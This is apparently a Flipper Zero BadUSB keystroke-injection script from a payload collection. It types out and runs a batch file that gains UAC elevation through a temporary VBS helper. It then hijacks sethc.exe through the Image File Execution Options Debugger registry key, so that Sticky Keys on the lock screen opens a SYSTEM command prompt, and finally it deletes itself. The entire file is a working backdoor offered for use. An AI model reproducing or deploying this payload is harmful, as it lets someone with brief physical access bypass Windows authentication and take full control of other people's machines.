Flipper/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Remote-Access/CommandLineBackdoor/CommandLineBackdoor.txt
2024-04-15 23:47:39 -07:00

100 lines
2.7 KiB
Plaintext

REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
REM Description: Creates a command prompt "backdoor" that can be launched in almost any "secure" Windows environment,
REM (Lock Screen for example) via Sticky Keys shortcuts (Pressing shift five times) or the keyboard combination Alt+Shift+PrtScr.
REM This then results in launching the command prompt in the same account as the current environment, i.e. SYSTEM or your user account.
REM Version: 1.0
REM Category: Remote_Access
REM plug in second USB in before the Flipper
DELAY 3000
CONTROL ESCAPE
DELAY 500
STRING notepad
DELAY 250
ENTER
DELAY 750
STRING @echo off
ENTER
STRING :init
ENTER
STRING setlocal DisableDelayedExpansion
ENTER
STRING set cmdInvoke=1
ENTER
STRING set winSysFolder=System32
ENTER
STRING set "batchPath=%~0"
ENTER
STRING for %%k in (%0) do set batchName=%%~nk
ENTER
STRING set "TEMPVBS=%temp%\OEgetPriv_run.vbs"
ENTER
STRING setlocal EnableDelayedExpansion
ENTER
STRING :checkPrivileges
ENTER
STRING NET FILE 1>NUL 2>NUL
ENTER
STRING if '%errorlevel%' == '0' (goto gotPrivileges) else (goto getPrivileges)
ENTER
STRING :getPrivileges
ENTER
STRING if '%1'=='ELEV' (echo ELEV & shift /1 & goto gotPrivileges)
ENTER
STRING echo Set UAC = CreateObject^("Shell.Application"^) > "%TEMPVBS%"
ENTER
STRING echo args = "ELEV " >> "%TEMPVBS%"
ENTER
STRING echo For Each strArg in WScript.Arguments >> "%TEMPVBS%"
ENTER
STRING echo args = args ^& strArg ^& " " >> "%TEMPVBS%"
ENTER
STRING echo Next>> "%TEMPVBS%"
ENTER
STRING if '%cmdInvoke%'=='1' goto InvokeCmd
ENTER
STRING echo UAC.ShellExecute "!batchPath!", args, "", "runas", 1 >> "%TEMPVBS%"
ENTER
STRING goto ExecElevation
ENTER
STRING :InvokeCmd
ENTER
STRING echo args = "/c """ + "!batchPath!" + """ " + args >> "%TEMPVBS%"
ENTER
STRING echo UAC.ShellExecute "%SystemRoot%\%winSysFolder%\cmd.exe", args, "", "runas", 1 >> "%TEMPVBS%"
ENTER
STRING :ExecElevation
ENTER
STRING "%SystemRoot%\%winSysFolder%\WScript.exe" "%TEMPVBS%" %*
ENTER
STRING exit /B
ENTER
STRING :gotPrivileges
ENTER
STRING setlocal & cd /d "%~dp0."
ENTER
STRING if '%1'=='ELEV' (del "%TEMPVBS%" 1>nul 2>nul & shift /1)
ENTER
STRING reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /ve /f && reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v "Debugger" /t REG_SZ /d "cmd.exe" /f && cls && echo Payload Installed Successfully && pause && goto end
ENTER
STRING cls
ENTER
STRING echo Payload Install Failed
ENTER
STRING pause
ENTER
STRING :end
ENTER
STRING del /F /Q "%~0" && exit
CONTROL s
DELAY 500
STRING %temp%\run.bat
TAB
STRING a
ENTER
DELAY 250
ALT F4
DELAY 250
CONTROL ESCAPE
DELAY 500
STRING %temp%\run.bat
ENTER